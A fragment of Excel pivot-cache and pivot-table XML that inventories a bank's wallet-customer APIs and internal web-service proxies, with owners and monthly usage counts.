    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Enrollment History"/>
    <n v="201"/>
    <x v="485"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2"/>
    <n v="22"/>
    <n v="207"/>
    <n v="203"/>
    <n v="178"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Management"/>
    <n v="200"/>
    <x v="486"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: '¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente '¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="1"/>
    <n v="14"/>
    <n v="17"/>
    <n v="9"/>
    <n v="17"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Management"/>
    <n v="201"/>
    <x v="486"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: '¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente '¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="1"/>
    <n v="14"/>
    <n v="17"/>
    <n v="9"/>
    <n v="17"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Purchases"/>
    <n v="200"/>
    <x v="487"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. '¢_x0009_QR '¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="1"/>
    <n v="64"/>
    <n v="204"/>
    <n v="130"/>
    <n v="137"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Purchases"/>
    <n v="201"/>
    <x v="487"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. '¢_x0009_QR '¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="1"/>
    <n v="64"/>
    <n v="204"/>
    <n v="130"/>
    <n v="137"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_ALM"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_AutServidor"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_SincServidor"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_SincServidorV2"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_BancaDigital"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_CMA_TOKEN"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_ERROR_ADAPTER_DP"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_GFE_GESTIONFACTURAELECTRONICA_CEN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_IC_CONSULTARINFORMACIONPRODUCTOCLIENTE_CIPC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SAP_ASYNC_EC_TO_ERP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SAP_SYNC_EC_TO_ERP"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_AccederMontoPreaprobadoTarjetaCredito_AMPTC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_RevisarIdentidadCliente_RIC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_RevisarIdentidadCliente_V2"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_TRF"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_VAL_InterfaceCMASeries2"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_VAL_SERIES4"/>
    <m/>
    <x v="300"/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MD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AE318A-B491-4461-A838-5F073DFC3042}" name="TablaDinámica2" cacheId="1"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chartFormat="3">
  <location ref="B29:C60" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="23">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items count="38">
        <item m="1" x="32"/>
        <item m="1" x="35"/>
        <item x="12"/>
        <item x="14"/>
        <item m="1" x="36"/>
        <item x="18"/>
        <item x="5"/>
        <item x="17"/>
        <item x="2"/>
        <item x="6"/>
        <item x="25"/>
        <item x="7"/>
        <item x="0"/>
        <item x="13"/>
        <item x="4"/>
        <item x="28"/>
        <item x="21"/>
        <item x="19"/>
        <item x="20"/>
        <item x="15"/>
        <item x="9"/>
        <item m="1" x="34"/>
        <item x="23"/>
        <item x="30"/>
        <item x="8"/>
        <item x="11"/>
        <item x="1"/>
        <item x="27"/>
        <item h="1" x="22"/>
        <item x="29"/>
        <item x="3"/>
        <item x="26"/>
        <item x="31"/>
        <item m="1" x="33"/>
        <item x="10"/>
        <item x="16"/>
        <item x="24"/>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10"/>
  </rowFields>
  <rowItems count="31">
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i>
      <x v="10"/>
    </i>
    <i>
      <x v="11"/>
    </i>
    <i>
      <x v="12"/>
    </i>
    <i>
      <x v="13"/>
    </i>
    <i>
      <x v="14"/>
    </i>
    <i>
      <x v="15"/>
    </i>
    <i>
      <x v="16"/>
    </i>
    <i>
      <x v="17"/>
    </i>
    <i>
      <x v="18"/>
    </i>
    <i>
      <x v="19"/>
    </i>
    <i>
      <x v="20"/>
    </i>
    <i>
      <x v="22"/>
    </i>
    <i>
      <x v="23"/>
    </i>
    <i>
      <x v="24"/>
    </i>
    <i>
      <x v="25"/>
    </i>
    <i>
      <x v="26"/>
    </i>
    <i>
      <x v="27"/>
    </i>
    <i>
      <x v="29"/>
    </i>
    <i>
      <x v="30"/>
    </i>
    <i>
      <x v="31"/>
    </i>
    <i>
      <x v="32"/>
    </i>
    <i>
      <x v="34"/>
    </i>
    <i>
      <x v="35"/>
    </i>
    <i>
      <x v="36"/>
    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="Cuenta de las APIs por EVC" fld="4" subtotal="count" baseField="10" baseItem="2"/>
  </dataFields>
  <formats count="14">
    <format dxfId="108">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="107">
      <pivotArea dataOnly="0" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="106">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
    <format dxfId="105">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="104">
      <pivotArea type="all" dataOnly="0" outline="0" fieldPosition="0"/>
    </format>
    <format dxfId="103">
      <pivotArea outline="0" collapsedLevelsAreSubtotals="1" fieldPosition="0"/>
    </format>
    <format dxfId="102">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
    <format dxfId="101">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="10" count="0"/>
        </references>
      </pivotArea>
    </format>
    <format dxfId="100">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="99">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
    <format dxfId="98">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="97">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
    <format dxfId="96">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
    <format dxfId="95">
      <pivotArea field="10" type="button" dataOnly="0" labelOnly="1" outline="0" axis="axisRow" fieldPosition="0"/>
    </format>
  </formats>
  <chartFormats count="2">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97EE80-778B-42BB-8F21-A0CF81357215}" name="TablaDinámica16" cacheId="1" dataOnRows="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
  <location ref="B79:D85" firstHeaderRow="1" firstDataRow="2" firstDataCol="1"/>
  <pivotFields count="23">
    <pivotField multipleItemSelectionAllowed="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField name="NOMBRE API" multipleItemSelectionAllowed="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisCol" multipleItemSelectionAllowed="1" showAll="0">
      <items count="489">
        <item h="1" x="1"/>
        <item h="1" x="2"/>
        <item h="1" x="3"/>
        <item h="1" x="4"/>
        <item h="1" x="5"/>
        <item h="1" x="6"/>
        <item h="1" x="7"/>
        <item h="1" x="8"/>
        <item h="1" x="9"/>
        <item h="1" x="12"/>
        <item h="1" x="13"/>
        <item h="1" x="10"/>
        <item h="1" x="11"/>
        <item h="1" x="14"/>
        <item h="1" x="15"/>
        <item h="1" x="17"/>
        <item h="1" x="18"/>
        <item h="1" x="19"/>
        <item h="1" x="20"/>
        <item h="1" x="21"/>
        <item h="1" x="22"/>
        <item h="1" x="23"/>
        <item h="1" x="24"/>
        <item h="1" x="25"/>
        <item h="1" x="26"/>
        <item h="1" x="35"/>
        <item h="1" x="36"/>
        <item h="1" x="37"/>
        <item h="1" x="33"/>
        <item h="1" x="34"/>
        <item h="1" x="31"/>
        <item h="1" x="30"/>
        <item h="1" x="27"/>
        <item h="1" x="32"/>
        <item h="1" x="28"/>
        <item h="1" x="29"/>
        <item h="1" x="38"/>
        <item h="1" x="39"/>
        <item h="1" x="43"/>
        <item h="1" x="44"/>
        <item h="1" x="45"/>
        <item h="1" x="46"/>
        <item h="1" x="40"/>
        <item h="1" x="41"/>
        <item h="1" x="42"/>
        <item h="1" x="47"/>
        <item h="1" x="48"/>
        <item h="1" x="49"/>
        <item h="1" x="50"/>
        <item h="1" x="51"/>
        <item h="1" x="53"/>
        <item h="1" x="54"/>
        <item h="1" x="55"/>
        <item h="1" x="56"/>
        <item h="1" x="57"/>
        <item h="1" x="58"/>
        <item h="1" x="59"/>
        <item h="1" x="60"/>
        <item h="1" x="62"/>
        <item h="1" x="63"/>
        <item h="1" x="61"/>
        <item h="1" x="64"/>
        <item h="1" x="65"/>
        <item h="1" x="68"/>
        <item h="1" x="66"/>
        <item h="1" x="67"/>
        <item h="1" x="69"/>
        <item h="1" x="70"/>
        <item h="1" x="71"/>
        <item h="1" x="72"/>
        <item h="1" x="74"/>
        <item h="1" x="73"/>
        <item h="1" x="75"/>
        <item h="1" x="76"/>
        <item h="1" x="77"/>
        <item h="1" x="79"/>
        <item h="1" x="80"/>
        <item h="1" x="81"/>
        <item h="1" x="82"/>
        <item h="1" x="83"/>
        <item h="1" x="84"/>
        <item h="1" x="85"/>
        <item h="1" x="86"/>
        <item h="1" x="87"/>
        <item h="1" x="52"/>
        <item h="1" x="88"/>
        <item h="1" x="89"/>
        <item h="1" x="90"/>
        <item h="1" x="92"/>
        <item h="1" x="93"/>
        <item h="1" x="94"/>
        <item h="1" x="91"/>
        <item h="1" x="95"/>
        <item h="1" x="96"/>
        <item h="1" x="97"/>
        <item h="1" x="98"/>
        <item h="1" x="99"/>
        <item h="1" x="100"/>
        <item h="1" x="101"/>
        <item h="1" x="104"/>
        <item h="1" x="102"/>
        <item h="1" x="103"/>
        <item h="1" x="108"/>
        <item h="1" x="109"/>
        <item h="1" x="112"/>
        <item h="1" x="113"/>
        <item h="1" x="114"/>
        <item h="1" x="115"/>
        <item h="1" x="116"/>
        <item h="1" x="110"/>
        <item h="1" x="111"/>
        <item h="1" x="117"/>
        <item h="1" x="118"/>
        <item h="1" x="119"/>
        <item h="1" x="120"/>
        <item h="1" x="122"/>
        <item h="1" x="121"/>
        <item h="1" x="123"/>
        <item h="1" x="124"/>
        <item h="1" x="125"/>
        <item h="1" x="126"/>
        <item h="1" x="128"/>
        <item h="1" x="127"/>
        <item h="1" x="105"/>
        <item h="1" x="129"/>
        <item h="1" x="130"/>
        <item h="1" x="131"/>
        <item h="1" x="132"/>
        <item h="1" x="133"/>
        <item h="1" x="135"/>
        <item h="1" x="136"/>
        <item h="1" x="134"/>
        <item h="1" x="137"/>
        <item h="1" x="138"/>
        <item h="1" x="139"/>
        <item h="1" x="394"/>
        <item h="1" x="141"/>
        <item h="1" x="106"/>
        <item h="1" x="142"/>
        <item h="1" x="143"/>
        <item h="1" x="144"/>
        <item h="1" x="145"/>
        <item h="1" x="146"/>
        <item h="1" x="107"/>
        <item h="1" x="147"/>
        <item h="1" x="148"/>
        <item h="1" x="149"/>
        <item h="1" x="150"/>
        <item h="1" x="151"/>
        <item h="1" x="152"/>
        <item h="1" x="153"/>
        <item h="1" x="154"/>
        <item h="1" x="156"/>
        <item h="1" x="157"/>
        <item h="1" x="155"/>
        <item h="1" x="161"/>
        <item h="1" x="162"/>
        <item h="1" x="159"/>
        <item h="1" x="160"/>
        <item h="1" x="163"/>
        <item h="1" x="164"/>
        <item h="1" x="168"/>
        <item h="1" x="165"/>
        <item h="1" x="170"/>
        <item h="1" x="169"/>
        <item h="1" x="166"/>
        <item h="1" x="167"/>
        <item h="1" x="171"/>
        <item h="1" x="172"/>
        <item h="1" x="173"/>
        <item h="1" x="174"/>
        <item h="1" x="177"/>
        <item h="1" x="178"/>
        <item h="1" x="175"/>
        <item h="1" x="176"/>
        <item h="1" x="179"/>
        <item h="1" x="180"/>
        <item h="1" x="181"/>
        <item h="1" x="183"/>
        <item h="1" x="182"/>
        <item h="1" x="184"/>
        <item h="1" x="186"/>
        <item h="1" x="187"/>
        <item h="1" x="185"/>
        <item h="1" x="188"/>
        <item h="1" x="189"/>
        <item h="1" x="190"/>
        <item h="1" x="191"/>
        <item h="1" x="192"/>
        <item h="1" x="193"/>
        <item h="1" x="194"/>
        <item h="1" x="195"/>
        <item h="1" x="198"/>
        <item h="1" x="202"/>
        <item h="1" x="199"/>
        <item h="1" x="200"/>
        <item h="1" x="201"/>
        <item h="1" x="204"/>
        <item h="1" x="203"/>
        <item h="1" x="205"/>
        <item h="1" x="206"/>
        <item h="1" x="207"/>
        <item h="1" x="208"/>
        <item h="1" x="209"/>
        <item h="1" x="212"/>
        <item h="1" x="213"/>
        <item h="1" x="215"/>
        <item h="1" x="216"/>
        <item h="1" x="217"/>
        <item h="1" x="218"/>
        <item h="1" x="214"/>
        <item h="1" x="219"/>
        <item h="1" x="210"/>
        <item h="1" x="220"/>
        <item h="1" x="222"/>
        <item h="1" x="221"/>
        <item h="1" x="225"/>
        <item h="1" x="226"/>
        <item h="1" x="227"/>
        <item h="1" x="228"/>
        <item h="1" x="229"/>
        <item h="1" x="223"/>
        <item h="1" x="224"/>
        <item h="1" x="230"/>
        <item h="1" x="231"/>
        <item h="1" x="232"/>
        <item h="1" x="233"/>
        <item h="1" x="234"/>
        <item x="235"/>
        <item h="1" x="236"/>
        <item h="1" x="237"/>
        <item h="1" x="238"/>
        <item h="1" x="239"/>
        <item h="1" x="242"/>
        <item h="1" x="243"/>
        <item h="1" x="244"/>
        <item h="1" x="245"/>
        <item h="1" x="246"/>
        <item h="1" x="247"/>
        <item h="1" x="240"/>
        <item h="1" x="211"/>
        <item h="1" x="241"/>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7"/>
        <item h="1" x="278"/>
        <item h="1" x="279"/>
        <item h="1" x="274"/>
        <item h="1" x="275"/>
        <item h="1" x="280"/>
        <item h="1" x="276"/>
        <item h="1" x="282"/>
        <item h="1" x="295"/>
        <item h="1" x="289"/>
        <item h="1" x="283"/>
        <item h="1" x="287"/>
        <item h="1" x="284"/>
        <item h="1" x="285"/>
        <item h="1" x="286"/>
        <item h="1" x="281"/>
        <item h="1" x="290"/>
        <item h="1" x="291"/>
        <item h="1" x="292"/>
        <item h="1" x="293"/>
        <item h="1" x="294"/>
        <item h="1" x="296"/>
        <item h="1" x="297"/>
        <item h="1" x="298"/>
        <item h="1" x="299"/>
        <item h="1" x="0"/>
        <item h="1" x="302"/>
        <item h="1" x="303"/>
        <item h="1" x="304"/>
        <item h="1" x="305"/>
        <item h="1" x="306"/>
        <item h="1" x="307"/>
        <item h="1" x="308"/>
        <item h="1" x="309"/>
        <item h="1" x="471"/>
        <item h="1" x="310"/>
        <item h="1" x="311"/>
        <item h="1" x="312"/>
        <item h="1" x="313"/>
        <item h="1" x="314"/>
        <item h="1" x="315"/>
        <item h="1" x="316"/>
        <item h="1" x="317"/>
        <item h="1" x="318"/>
        <item h="1" x="319"/>
        <item h="1" x="326"/>
        <item h="1" x="327"/>
        <item h="1" x="324"/>
        <item h="1" x="321"/>
        <item h="1" x="322"/>
        <item h="1" x="323"/>
        <item h="1" x="325"/>
        <item h="1" x="329"/>
        <item h="1" x="331"/>
        <item h="1" x="330"/>
        <item h="1" x="328"/>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3"/>
        <item h="1" x="362"/>
        <item h="1" x="364"/>
        <item h="1" x="365"/>
        <item h="1" x="366"/>
        <item h="1" x="367"/>
        <item h="1" x="368"/>
        <item h="1" x="369"/>
        <item h="1" x="370"/>
        <item h="1" x="371"/>
        <item h="1" x="378"/>
        <item h="1" x="379"/>
        <item h="1" x="376"/>
        <item h="1" x="380"/>
        <item h="1" x="381"/>
        <item h="1" x="382"/>
        <item h="1" x="377"/>
        <item h="1" x="383"/>
        <item h="1" x="384"/>
        <item h="1" x="385"/>
        <item h="1" x="372"/>
        <item h="1" x="386"/>
        <item h="1" x="387"/>
        <item h="1" x="373"/>
        <item h="1" x="388"/>
        <item h="1" x="389"/>
        <item h="1" x="390"/>
        <item h="1" x="374"/>
        <item h="1" x="375"/>
        <item h="1" x="391"/>
        <item h="1" x="392"/>
        <item h="1" x="393"/>
        <item h="1" x="440"/>
        <item h="1" x="288"/>
        <item h="1" x="395"/>
        <item h="1" x="396"/>
        <item h="1" x="438"/>
        <item h="1" x="434"/>
        <item h="1" x="16"/>
        <item h="1" x="432"/>
        <item h="1" x="433"/>
        <item h="1" x="436"/>
        <item h="1" x="437"/>
        <item h="1" x="439"/>
        <item h="1" x="435"/>
        <item h="1" x="398"/>
        <item h="1" x="441"/>
        <item h="1" x="442"/>
        <item h="1" x="443"/>
        <item h="1" x="404"/>
        <item h="1" x="444"/>
        <item h="1" x="445"/>
        <item h="1" x="399"/>
        <item h="1" x="400"/>
        <item h="1" x="405"/>
        <item h="1" x="401"/>
        <item h="1" x="406"/>
        <item h="1" x="446"/>
        <item h="1" x="402"/>
        <item h="1" x="403"/>
        <item h="1" x="158"/>
        <item h="1" x="407"/>
        <item h="1" x="447"/>
        <item h="1" x="408"/>
        <item h="1" x="409"/>
        <item h="1" x="448"/>
        <item h="1" x="449"/>
        <item h="1" x="450"/>
        <item h="1" x="410"/>
        <item h="1" x="411"/>
        <item h="1" x="412"/>
        <item h="1" x="413"/>
        <item h="1" x="414"/>
        <item h="1" x="451"/>
        <item h="1" x="452"/>
        <item h="1" x="415"/>
        <item h="1" x="453"/>
        <item h="1" x="419"/>
        <item h="1" x="454"/>
        <item h="1" x="416"/>
        <item h="1" x="417"/>
        <item h="1" x="418"/>
        <item h="1" x="301"/>
        <item h="1" x="455"/>
        <item h="1" x="456"/>
        <item h="1" x="457"/>
        <item h="1" x="458"/>
        <item h="1" x="459"/>
        <item h="1" x="460"/>
        <item h="1" x="462"/>
        <item h="1" x="461"/>
        <item h="1" x="420"/>
        <item h="1" x="422"/>
        <item h="1" x="421"/>
        <item h="1" x="463"/>
        <item h="1" x="464"/>
        <item h="1" x="423"/>
        <item h="1" x="424"/>
        <item h="1" x="465"/>
        <item h="1" x="466"/>
        <item h="1" x="425"/>
        <item h="1" x="427"/>
        <item h="1" x="428"/>
        <item h="1" x="429"/>
        <item h="1" x="430"/>
        <item h="1" x="431"/>
        <item h="1" x="426"/>
        <item h="1" x="467"/>
        <item h="1" x="468"/>
        <item h="1" x="469"/>
        <item h="1" x="470"/>
        <item h="1" x="472"/>
        <item h="1" x="397"/>
        <item h="1" x="473"/>
        <item h="1" x="474"/>
        <item h="1" x="475"/>
        <item h="1" x="476"/>
        <item h="1" x="477"/>
        <item h="1" x="478"/>
        <item h="1" x="479"/>
        <item h="1" x="480"/>
        <item h="1" x="481"/>
        <item h="1" x="483"/>
        <item h="1" x="484"/>
        <item h="1" x="485"/>
        <item h="1" x="486"/>
        <item h="1" x="487"/>
        <item h="1" x="482"/>
        <item h="1" x="300"/>
        <item h="1" x="78"/>
        <item h="1" x="140"/>
        <item h="1" x="196"/>
        <item h="1" x="197"/>
        <item h="1" x="320"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField multipleItemSelectionAllowed="1"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s>
  <rowFields count="1">
    <field x="-2"/>
  </rowFields>
  <rowItems count="5">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
    <i i="2">
      <x v="2"/>
    </i>
    <i i="3">
      <x v="3"/>
    </i>
    <i i="4">
      <x v="4"/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="6"/>
  </colFields>
  <colItems count="2">
    <i>
      <x v="228"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </colItems>
  <dataFields count="5">
    <dataField name="Mar" fld="17" baseField="4" baseItem="0" numFmtId="3"/>
    <dataField name="Abr" fld="18" baseField="4" baseItem="0" numFmtId="3"/>
